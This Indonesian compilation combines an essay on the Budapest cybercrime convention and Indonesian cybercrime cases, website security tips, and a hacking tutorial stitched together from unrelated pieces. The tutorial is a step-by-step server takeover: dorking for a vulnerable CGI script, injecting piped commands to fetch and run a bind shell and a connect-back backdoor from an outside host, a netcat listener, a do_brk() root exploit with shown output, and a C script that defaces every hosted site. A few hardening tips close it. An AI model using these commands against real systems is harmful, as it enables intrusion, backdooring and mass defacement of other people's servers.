Predikat palanggaran seperti dalam Pasal 2 ayat h adalah pelanggaran dari setiap hasil yang bisa menjadi subyek dari suatu pelanggaran, yang ditetapkan dalam pasal 6 konvensi ini. Dimana Pasal 6 ayat 1 berbunyi bahwa setiap negara harus mengadopsi sesuai dengan prinsip-prinsip hukum domestik, antala legislatif dan langkah-langkah sebagai mungkin perlu menetapkan sebagai pelanggaran pidana.” Artinya setiap negara harus membuat hukum yang mengatur tentang penegakan Cyber Crime sebagai bukti keseriusan untu melaksanakan kaidah Konsensi Palermo, berupa UU no. 11 tahun 2008 tentang ITE.
Konvensi ini digunakan untuk semakin terjaminnya keamananan Internasional dalam menghadapi kejahatan transnasional dalam kerjasama internasional. Pasal 27 ayat 1 menerangkan bahwa ;“Pihak Negara-negara akan bekerjasama dengan erat satu sama lain sesuai dengan rumah tangga masing-masing sesuai hukum dan administrasi untuk meningkatkan efektifitas penegakan hukum untuk memerangi tindakan pelanggaran yang mencakup dalam konvensi tiap Negara wajib mengadobsi langkah-langkah efektif tersebut.” Bentuk kerjasama dapat berupa organisasi artau konsensi dan atau merespon tiap informasi secara bersama-sama.
Implementasi dari konvensi ini adalah tertuang dalam pasal 34 ayat ;
1. Setiap negara harus mengambil langkah-langkah yang diperlukan termasuk legislatif dan tindakan-tindakan administratif sesuai dengan prinsip-prinsip dan hukum domestik, untuk menjamin kewajiban dalam konvensi ini.
2. Pelanggaran yang sesuai dengan pasal 5.6, 8 dan 23 dalam pasal konvesi ini harus dibentuk dalam setiap negara untuk menghadapi kriminal yang mencakup wilayah transnaional baik pribadi maupun kelompok.
3. Setiap negara harus mengadobsi konvensi ini.
Inilah yang mendasari dibuatnya sebuah hukum yang mengatur dalam mengatasi kejathatan transnasional dalam hal ini cyber crime. Konvensi Cybercrime Budapest, 23.XI.2001isinya merupakan kerjasama dengan negara lain pihak untuk Konvensi cyber Crime. Diyakinkan akan kebutuhan yang, seperti soal prioritas, pidana umum yang bertujuan untuk melindungi masyarakat
terhadap cybercrime, antara lain mengadopsi undang-undang yang sesuai dan mendorong kerjasama internasional. Sadar akan perubahan besar yang dibawa oleh digitalisation, konvergensi dan terus globalisasi komputer jaringan.
Keprihatin dengan resiko bahwa komputer dan jaringan informasi elektronik dapat juga digunakan untuk melakukan pelanggaran pidana dan bukti-bukti yang berkaitan dengan pelanggaran seperti itu dapat disimpan dan dipindahkan oleh jaringan ini.
Mengakui perlunya kerjasama antara negara dan industri swasta dalam memerangi cybercrime dan kebutuhan untuk melindungi kepentingan sah dalam penggunaan dan pengembangan teknologi informasi. Percaya bahwa kebutuhan yang efektif memerangi cybercrime meningkat, cepat dan berfungsi dengan baik kerjasama internasional dalam masalah pidana.Yakin bahwa hadir Konvensi perlu untuk menghalangi tindakan yang ditujukan terhadap kerahasiaan, integritas dan ketersediaan sistem komputer, jaringan komputer dan data serta penyalahgunaan seperti itu, sistem jaringan dan data dengan menyediakan untuk melakukan seperti criminalisation, seperti dijelaskan dalam Konvensi ini, dan adopsi dari kekuasaan yang cukup efektif untuk memerangi kejahatan pelanggaran seperti itu, dengan memfasilitasi mereka deteksi, investigasi dan penuntutan baik pada tingkat domestik dan internasional dan dengan menyediakan perjanjian untuk cepat dan kerjasama internasional.
Dengan mempertimbangkan ada pertemuan Dewan Eropa pada kerjasama di bidang hukuman, serta perjanjian serupa yang ada di antara anggota Dewan Negara-negara Eropa dan negara lainnya, dan menekankan bahwa saat ini Konvensi ini dimaksudkan untuk memperlengkapi orang-orang untuk konvensi melakukan penyelidikan dan proses pidana tentang pelanggaran pidana yang
berkaitan dengan sistem komputer dan data yang lebih efektif dan untuk mengaktifkan kumpulan bukti elektronik dalam bentuk pelanggaran pidana.
Isi kesepakatan adalah :
1. Definisi tentang Cyber Crime Devinisi untuk tujuan Konvensi ini dari sebuah
a. “sistem komputer” adalah salah satu komponen atau sekelompok saling terkait atau perangkat, satu atau lebih yang berdasarkan program, melakukan pengolahan data otomatis.
b. “komputer data” merupakan salah satu perwakilan dari fakta, konsep atau informasi dalam bentuk yang sesuai untuk diproses dalam sistem komputer, termasuk program yang cocok untuk menyebabkan sistem komputer untuk melakukan fungsi;
c. “layanan” berarti publik atau badan swasta yang memberikan kepada pengguna layanan dengan kemampuan untuk berkomunikasi dengan sistem komputer, dan entitas lain yang proses atau toko-toko komputer data atas nama seperti komunikasi atau pengguna layanan dari operator.
d. “lalu lintas data” berarti komputer manapun yang berkaitan dengan data yang komunikasi dengan sistem komputer, yang dihasilkan oleh sistem komputer yang membentuk bagian dalam rantai komunikasi, menunjukkan komunikasi dari asal, tujuan, rute, waktu, tanggal, ukuran, durasi, atau jenis layanan.
2. Langkah-langkah yang akan diambil di tingkat nasional.
a. substantif hukum pidana
b. Substansi Hukum Pidana
c. Prosedur Hukum
d. Yurisdiksi
3. Kerjasama Internasional
a. General prinsip yang berhubungan dengan kerjasama.
b. General prinsip yang berhubungan dengan ekstradisi
c. General prinsip yang berhubungan dengan bantuan
d. Ekspekditen kelestarian komputer yang digunakan.
Tujuan dari Konvensi ini adalah untuk melengkapi berlaku perjanjian bilateral atau multilateral atau sebagai perjanjian antara pihak, termasuk ketentuan:
a.Konvensi Eropa tentang ekstradisi, dibuka untuk tanda tangan di Paris, pada 13 Desember 1957 (ETS No 24);
b.Konvensi Eropa tentang Mutual Assistance in Criminal Matters, dibuka untuk tanda tangan di Strasbourg, pada tanggal 20 April 1959 (ETS No 30);
c. Protokol Tambahan untuk Konvensi Eropa tentang Mutual Assistance in Criminal Matters, dibuka untuk tanda tangan di Strasbourg, pada tanggal 17 Maret 1978 (ETS No 99).
d. Jika dua atau lebih bagian telah menyimpulkan kesepakatan atau perjanjian pada hal-hal yang dibincangkan di dalam Konvensi ini atau jika tidak ada hubungan mereka didirikan pada hal-hal seperti itu, atau di masa depan mereka harus melakukannya, mereka juga berhak untuk menerapkan bahwa kesepakatan atau perjanjian atau untuk mengatur hubungan yang sesuai. Namun, di mana pihak dalam membangun hubungan mereka sehubungan dengan hal-hal yang berkaitan dengan hadir dalam Konvensi selain yang diatur di dalamnya, mereka akan melakukannya dengan cara yang tidak konsisten dengan tujuan-tujuan Konvensi dan prinsip.
I.4 aktivitas dari cyber crime
Dunia perbankan melalui Internet (ebanking) Indonesia, dikejutkan oleh ulah seseorang bernama Steven Haryanto, seorang hacker dan jurnalis pada majalah Master Web. Lelaki asal Bandung ini dengan sengaja membuat situs asli tapi palsu layanan Internet banking Bank Central Asia, (BCA). Steven membeli domain-domain dengan nama mirip www.klikbca.com (situs asli Internet banking BCA), yaitu domain wwwklik-bca.com, kilkbca.com, clikbca.com, klickca.com.
dan klikbac.com. Isi situs-situs plesetan inipun nyaris sama, kecuali tidak adanya security untuk bertransaksi dan adanya formulir akses (login form) palsu. Jika nasabah BCA salah mengetik situs BCA asli maka nasabah tersebut masuk perangkap situs plesetan yang dibuat oleh Steven sehingga identitas pengguna (user id) dan nomor identitas personal (PIN) dapat di ketahuinya. Diperkirakan, 130 nasabah BCA tercuri datanya. Menurut pengakuan Steven pada situs bagi para webmaster di Indonesia, www.webmaster.or.id.
Selain carding, masih banyak lagi kejahatan yang memanfaatkan Internet.Tentunya masih hangat dalam pikiran kita saat seorang hacker bernama Dani Hermansyah, pada tanggal 17 April 2004 melakukan deface (Deface disini berarti mengubah atau mengganti tampilan suatu website) dengan mengubah nama-nama partai yang ada dengan nama-nama buah dalam website www.kpu.go.id, yang mengakibatkan berkurangnya kepercayaan masyarakat terhadap pemilu yang sedang berlangsung pada saat itu. Dikhawatirkan, selain nama–nama partai yang diubah bukan tidak mungkin angka-angka jumlah pemilih yang masuk di sana menjadi tidak aman dan dapat diubah, padahal dana yang dikeluarkan untuk sistem teknologi informasi yang digunakan oleh KPU sangat besar sekali.
Khusus kasus Bank DKI Cabang Pembantu Tebet, di mana salah seorang asisten pelayanan nasabah yang bernama Dwi Norman melakukan pemindah bukuan (transfer) dana sebesar 3,5 Miliyar dari rekening antar kantor fiktif ke rekening pasif, uang itu kemudian diambil melalui kliring maupun tunai atau ATM.
Pembobolan tersebut dilakukan dengan menggunakan password Kepala Bank DKI Cabang Pembantu Tebet. Proses penyelesaian hukumnya pun hingga kini masih ditangani oleh Kejaksaan Tinggi DKI sementara tersangka Dwi Norman hingga kini masih menjadi buronan polisi.Teknik lain adalah yang memanfaatkan celah sistem keamanan server alias hole Cross Server Scripting (XXS) yang ada pada suatu situs. XXS adalah kelemahan aplikasi di server yang memungkinkan user atau pengguna menyisipkan barisbaris perintah lainnya. Biasanya perintah yang disisipkan adalah Javascript sebagai jebakan, sehingga pembuat hole bisa mendapatkan informasi data pengunjung lain yang berinteraksi di situs tersebut. Makin terkenal sebuah website yang mereka deface, makin tinggi rasa kebanggaan yang didapat.
I.5 trend yang terjadi di masyarakat
Kejahatan cyber secara hukum bukanlah kejahatan sederhana karena tidak menggunakan sarana konvensional, tetapi menggunakan komputer dan internet. Sebuah data informal mensinyalir bahwa Indonesia adalah negara “hacker” terbesar ketiga di dunia. Sedangkan untuk Indonesia, kota “hacker” pertama diduduki oleh kota Semarang, kemudian kota Yogyakarta Pada kenyataannya “Cyber law” tidak terlalu diperdulikan oleh mayoritas bangsa di negara ini, karena yang terlibat dan berkepentingan terhadap konteks tersebut tidaklah terlalu besar. Pertanyaan menarik, berapa populasi masyarakat yg terlibat aktif dalam teknologi informasi, dijamin tidak lebih dari 10% dari populasi penduduk. Mungkin hanya beberapa persen saja yang melakukan penyalahgunaan teknologi informasi khususnya dalam hal maya. Dan itu berarti secara kuantitas aktifitas kejahatan maya masih relatif kecil.

Tips Website Aman dari Hacker

Written by islamarket.net
Sunday, 10 May 2009 17:27 –
Berikut ini adalah beberapa tips dalam Membangun Websites yang tidak mudah di jebol Hacker. Tips ini dibuat oleh moderator komunitas white hacker Yogyafree, Nathan Gusti Ryan.Sehubungan dengan maraknya deface atau hacking isi websites pemerintah maupun organisasi besar maka berikut ini berbagai tips yang dapat dilakukan oleh web administrator untuk membangun Webserver yang tangguh dan tidak mudah dibobol oleh Hacker.
Tips Pertama
Pada umumnya, hosting websites dilakukan pada ISP (Internet Service Provider) dengan space tertentu, lalu kita melakukan upload website via FTP atau via CPANEL (Control Panel).Webhosting inilah yang rawan dan mudah sekali dibobol oleh Hacker di antaranya mengunakan teknik SQL Injection. Maka disarankan agar mengunakan Server sendiri dan mengunakan VPS (Virtual Private Server). Dengan Server sendiri atau Virtual Private Server bisa mengunakan berbagai proteksi terhadap kita secara Customized. Beda dengan Web Hosting, proteksi security dilakukan terserah apa kata ISP. Kelemahan proteksi inilah yang dimanfaatkan oleh Hacker dengan melakukan Port Scanning untuk menemukan celah security yang bisa ditembus untuk bisa masuk dan mengambil alih websites tersebut.
Tips Kedua
Mengunakan Hardware Security yang powerfull diantaranya yang memiliki fitur Firewall, IDS (Intrusion Detection System) dan IPS (Intrusion Prevention System). Contohnya mengunakan Fortigate, Cisco Series Security, 3Com Tipping Point, dan lainnya. Dapat juga mengunakan software IDS seperti Black ICE Countermeasures ataupun Distro Linux untuk security system seperti Smootwall, Monowall, Customized Distro Linux, dan lainnya. Umumnya, baik software maupun hardware security ini bisa secara otomatis mengirimkan email alert bahkan bisa mengirimkan alert via SMS jika system mendeteksi adanya serangan dari hacker.
Tips Ketiga
Mengunakan system yang Stable yang sudah perfect systemnya, sehingga kemungkinan adanya celah keamanan juga dapat diminimalkan. Banyaknya software atau tool web builder dengan berbagai versi terutama versi gratis/ free License/ Freeware, sebaiknya para pemakai memilih versi yang sudah dinyatakan Stable. Seperti adanya BUG pada software Joomla versi 1.5.0 - 1.5.5.
Tips Keempat
Web Administrator/ System Administrator harus melakukan Review, Testing, Simulasi secara berkala terhadap keamanan pada Server yang dikelolanya. Bahkan bisa bekerja sama dengan Hacker (White Hacker yang dapat dipercaya reputasinya) untuk melakukan Audit terhadap implementasi Security webservernya.

KECEROBOHAN WEBMASTER, PROSES JEBOLNYA ROOT SEBUAH HOSTING

Banyak sekali tujuan sebuah proses hacking terhadap server, ada sebagian orang
melakukan hacking hanya sebatas deface, untuk tujuan carding, untuk mendapat full
akses (root priviledges) server, ada juga yang bertujuan untuk mematikan servis sistem dan network (Denial of Services). Proses hacking dapat dilakukan secara acak ataupun tertarget, acak dalam artian attacker melakukan proses hacking secara masal misal dengan bantuan search engine google, sedangkan tertarget maksudnya attacker
melakukan hacking terhadap sebuah sistem atau server tertentu. Pada kesempatan kali ini penulis mo sharing ma temen-temen bagaimana root priviledge server sebuah hosting bisa di peroleh attacker dengan bantuan search engine (proses hacking acak).
Banyak sekali orang beranggapan bahwa tanggung jawab sekuritas sistem dalam sebuah server anggaplah server hosting adalah tanggun jawab dari sysadmin sedangkan para webmaster site hanya berpikir agar sitenya dikunjungi dan banyak sekali para webmaster (walaupun gak semua) yang mengacuhkan sekuritas. Upzz, inilah jalan masuk terbaik bagi attacker untuk masuk ke sistem, why..?? Tentu saja karena port 80 yang harus selalu terbuka. Lalu bagaimana root priviledge sebuah server diperoleh..?? Berikut ini detail teknik yang sering dipakai oleh para attacker untuk memperoleh tujuan full akses.Hole via URL yang biasa dipakai untuk memperoleh full akses terhadap sistem adalah hole remote ekskusi seperti PHP injection dan CGI remote execution. Sebuah assumsi bahwa dalam sebuah hosting ada salah satu webmaster yang menggunakan software vulnerable yang belum terpatch misalnya w_s3adix.cgi yang di produksi oleh Y.SAK. Berikut hole dari w_s3adix.cgi yang ditemukan oleh blahpok a.k.a choi GSO community w_s3adix.cgi?st=parameter&re=parameter& o=file.txt|command|.
Tahap pertama yang dilakukan oleh para attacker adalah menggunakan search engine google untuk mencari website yang menginstall software w_3sadix.cgi vulnerable missal dalam box keyword di isi dengan allinurl : w_3sadix.cgi? no= . Setelah attacker mendapatkan sasarannya inilah saat attacker mencoba-coba bagaimana dia memperoleh full akses terhadap sistem. Untuk memperoleh root priviledges dari hole via URL seorang attacker harus bisa memperoleh lokal shell sistem, ada dua cara yang biasa dipakai para attacker untuk memperoleh lokal shell yaitu menggunakan bindty dan teknik connectback.
Perlu digaris bawahi bahwa hole yang digunakan untuk memperoleh shell adalah
hole remote ekskusi yang memungkinkan bagi attacker untuk mengakses command
sistem (console) via browser. Sehingga dari browser attacker bisa mendownload file ke sistem target, mengkompile dan mengekskusinya. Download script bindty ke sistem
target, kompile dan ekskusi.http://student.te.ugm.ac.id/~phoenix03/audit/bindedit.c => Code bindty shell by sd then modified by KillFinger then Modified again by Ph03n1X.
Misal anda menggunakan website http://webmu.com/bind.c untuk menghosting script bindty maka download script bindty itu ke server sistem target untuk memperoleh shell lokal target. Tentunya anda harus mendownload script tadi ke directory yang bisa anda tulisi misalnya /tmp tau /var/tmp. Kemudian kompile dan eksekusi http://www.target.com/w_s3adix.cgi?st=parameter&re=parameter&no=file.txt|wget
http://webmu.com/bind.c -O /var/tmp/bind.c| http://www.target.com w_s3adix.cgi?st=parameter&re=parameter&no=file.txt|gcc -o /var/tmp/bind /var/tmp/bind.c;/var/tmp/bind 4000|
Lihat diatas kita menggunakan port 4000 sebagai binding port, sekarang cek apakah port 4000 terbuka, scan dengan phnxscan.c yang dibuat penulis, anda dapat mendownload source kodenya di http://student.te.ugm.ac.id/~phoenix03/tutorial/phnxscan.c. Kompile dan ekskusi script tadi menggunakan gcc dan scanlah port 4000 servet www.target.com.myshell~>gcc -o phnxscan phnxscan.c
myshell~> ping -c 2 target.com
PING target.com (210.189.77.28): 56 data bytes
64 bytes from 210.189.77.28: icmp_seq=0 ttl=38 time=428.044 ms
64 bytes from 210.189.77.28: icmp_seq=1 ttl=38 time=428.624 ms
--- target.com ping statistics ---
2 packets transmitted, 2 packets received, 0.0% packet loss
round-trip min/avg/max/std-dev = 428.044/428.334/428.624/0.290 ms
myshell~> phnxscan -p 4000 -s 210.189.77.28
port 4000 (tcp) terbuka
Telnet server target port 4000, jika berhasil maka anda akan disuruh memasukkan
password yang default dari scriptnya changeme
myshell~> telnet 210.189.77.28 4000
Trying 210.189.77.28...
Connected to target.com (210.189.77.28).
Escape character is '^]'.
passwd changeme
changeme
=- WELCOME TO THE SERVER -=
sh-2.05b$
Cara kedua untuk menaklukan lokal shell target adalah dengan metode connect-back menggunakan scipt buatan AresU dari 1stlink.
http://student.te.ugm.ac.id/~phoenix03/audit/backup.pl => Coded By AresU
Seperti halnya menggunakan bindty, download script connect-back ke server target ke
directory yang bisa ditulisi misalnya /tmp atau /var/tmp.
http://www.target.com/w_s3adix.cgi?st=parameter&re=parameter&no=file.txt|wget
http://webmu.com/back.pl -O /var/tmp/back.pl|
Kemudian jalankan netcat di box anda dengan option port listen -l, box anda harus
mempunyai IP publik sehingga bisa di akses cross internet (misal 212.123.24.190).
Ekskusi script connect-back yang sudah di download di server target melalui browser.
myshell~> nc -l 21
www.target.com/w_s3adix.cgi?st=parameter&re=parameter&no=file.txt|perl
/var/tmp/back.pl 212.123.24.190 21|
Kemudian lihat box anda.....
myshell~>nc -l 21
(c)AresU Connect-Back Backdoor Shell v1.0
1ndonesia Security Team (1st)
Linux xxxxxxxxxxx 2.4.20-8 #1 Thu Mar 13 16:42:56 EST 2003 i586 i586 i386
GNU/Linux
uid=502(apache) gid=502(apache) groups=502(apache)
cat /etc/issue
Red Hat Linux release 9 (Shrike)
Kernel \r on an \m
Weksss, di sini penulis memperoleh target server Red Hat 9 (Shrike) yang versi kernelnya
2.4.20-8, kernel ini secara default memiliki hole lokal do_brk() yang kalo gak di patch
maka privledge root bisa diperoleh. Sebuah eksploits yang biasa digunakan untuk
mengekploitasi bug ini adalah hatorihanzo.c yang bisa anda download di link berikut
http://student.te.ugm.ac.id/~phoenix03/audit/hatorihanzo.c .
Kemudian ikuti step step berikut :
wget http://student.te.ugm.ac.id/~phoenix03/audit/hatorihanzo.c
--04:00:20-- http://student.te.ugm.ac.id/%7Ephoenix03/audit/hatorihanzo.c
=> `hatorihanzo.c'
Resolving student.te.ugm.ac.id... done.
Connecting to student.te.ugm.ac.id[222.124.24.19]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6,510 [text/plain]
0K ...... 100% 9.35 KB/s
04:00:24 (9.35 KB/s) - `hatorihanzo.c' saved [6510/6510]
gcc -static -o hatori hatorihanzo.c
ls -al
total 440
drwxrwxrwt 2 root root 4096 Sep 3 04:00 .
drwxr-xr-x 18 root root 4096 Sep 9 2004 ..
-rwxr-xr-x 1 root root 428460 Sep 3 04:00 hatori
-rw-r--r-- 1 root root 6510 Dec 16 2003 hatorihanzo.c
./hatori (wait a moment)
id
uid=0(root) gid=0(root)
Binggo, Sekarang anda memperoleh shell root target, yah sekarang anda adalah
mahadewa di sistem itu :P~. Lalu bagaimana masalah backdooring hmm, cari referensinya di google, gunakan keyword sshdoor, shv dan lainnya. Sekarang penulis
hanya hendak berbagi pengalaman tentang mass defacing server target (Assumsi penulis bahwa server yang ditaklukan adalah server hosting). Untuk mengetahui di folder mana website-website di server itu disimpan, cari file konfigurasi apache httpd.conf, baca dan perhatikan baik-baik dimana DocumentRoot dari website yang ada.
find / -name httpd.conf |
/usr/local/apache2/conf/httpd.conf
cat /usr/local/apache2/conf/httpd.conf
Berikut ini konfigurasi virtual domain yang didapat :

ServerName xxxxxxxx.jp
ServerAdmin webmaster@xxxxxxx.jp
ServerAlias xxxxxxx.jp
ScriptAlias /cgi-bin/ /home/beso-kbkb/public_html/cgi-bin/
DocumentRoot /home/beso-kbkb/public_html
user xxxxxxxx
group xxxxxxxx
CustomLog logs/210.189.77.28:80-www.xxxxxxx.jp-access.log combined
ErrorLog logs/210.189.77.28:80-www.xxxxxxxx.jp-error.log
CustomLog /home/members/public_html/logs/ xxxxxxxx /access_log combined
#LCControlDomain kbkb.beso.jp
AliasMatch ^/~([^/]+)/(.*) /home/lcvirtualdomain/ xxxxxxxx.jp/users/$1/public_html/$2


ServerName xxxxxxxx.ne.jp
ServerAdmin webmaster@ xxxxxxxx.ne.jp
ServerAlias xxxxxxxx.ne.jp
ScriptAlias /cgi-bin/ /home/ xxxxxxxx /public_html/cgi-bin/
DocumentRoot /home/ xxxxxxxx /public_html
user xxxxxxxx
group xxxxxxxx
CustomLog logs/210.189.77.28:80-www. xxxxxxxx.ne.jp-access.log combined
ErrorLog logs/210.189.77.28:80-www. xxxxxxxx.ne.jp-error.log
CustomLog /home/members/public_html/logs/ xxxxxxxx/access_log combined
#LCControlDomain xxxxxxxx.ne.jp
AliasMatch ^/~([^/]+)/(.*) /home/lcvirtualdomain/
xxxxxxxx.ne.jp/users/$1/public_html/$2

Sekarang bisa anda lihat bahwa DocumentRoot dari masing-masing website adalah
/home/nama-website/public_html/ dan semua website terletak di subdirectory /home.
Untuk melakukan deface masal lakukan langkah-langkah berikut :
cd /home
ls > host.txt
Kemudian buat script berikut, terserah bagaimana cara anda yang jelas script ini beserta hasil ekskusinya harus di simpan di directory /home.
#include "stdio.h"
/* Coded By Ph03n1X
king_purba@yahoo.co.uk
student.te.ugm.ac.id/~phoenix03
*/
main()
{
FILE *ax;
char aa[1000],bb[1000];
if((ax=fopen("host.txt","r"))==NULL)
{
printf("Gagal\n");
exit(0);
}
while(fgets(aa,sizeof(aa),ax))
{
aa[strlen(aa)-1]='\0';
snprintf(bb,sizeof(bb),"echo hack by Ph03n1X > %s/public_html/deface.txt",aa);
system(bb);
}s
ystem("find /home -name deface.txt > result.txt");
}
Simpan script diatas sebagai file berekstensi .c misal deface.c, kompile dan ekskusi di
folder /home.
gcc -o deface deface.c
./deface
Sekarang lihat hasil deface masal anda di file result.txt yang dihasilkan dari ekskusi script diatas.Setelah bisa menjebol sistem, tentu tidaklah lengkap kalo tidak bisa menambalnya. Lalu bagaimanakah seorang sysadmin seharusnya untuk meminimalkan kejadian seperti ini.
lihatlah bahwa hole awal sistem adalah hole user dalam hal ini webmaster salah satu
website yang di hosting di server, maka tidaklah mungkin untuk bisa memantau semua
user apalagi kalo jumlahnya cukup banyak. Berikut beberapa tips untuk meminimalkan
kejadian seperti ini.
1. Sering-seringlah check directory /tmp dan /var/tmp karena ini adalah directory
favorit para intruder.
2. Sering-seringlah melakukan checking terhadap logs sistem seperti access_logs
apache, /var/log/authlog, /var/logs/adduser dan lain-lainnya
3. Buatlah directory /tmp dalam partisi hardisk terpisah, kemudian hapus directory
/var/tmp default dan ganti dengan ln -s /tmp /var/tmp
Berikan option noexec dan nosuid di partis /tmp melalui /etc/fstab misalnya :
/dev/wd0h /tmp ffs rw,noexec,noatime,nodev,nosuid 1 2
4. Kemudian jika anda menggunakan script server side, disable semua fungsi yang
digunakan untuk mengakses command system. Misalnya untuk PHP disable
fungsi-fungsi berikut dari php.ini disable_functions = escapeshellarg, escapeshellcmd, exec, passthru, proc_close, proc_get_status, proc_nice, proc_open,proc_terminate, shell_exec, system
5. Gunakan firewall dengan default deny terutama untuk semua koneksi masuk dan
forward.
6. Selalu melakukan patching jika hole baru ditemukan, untuk ini dituntut kerja
keras admin dalam mencari informasi.
Mudah-mudahan tulisan ini bermanfaat walaupun singkat :P~
REFERENSI :
http://google.co.id
http://bosen.net
http://jasakom.com
http://echo.or.id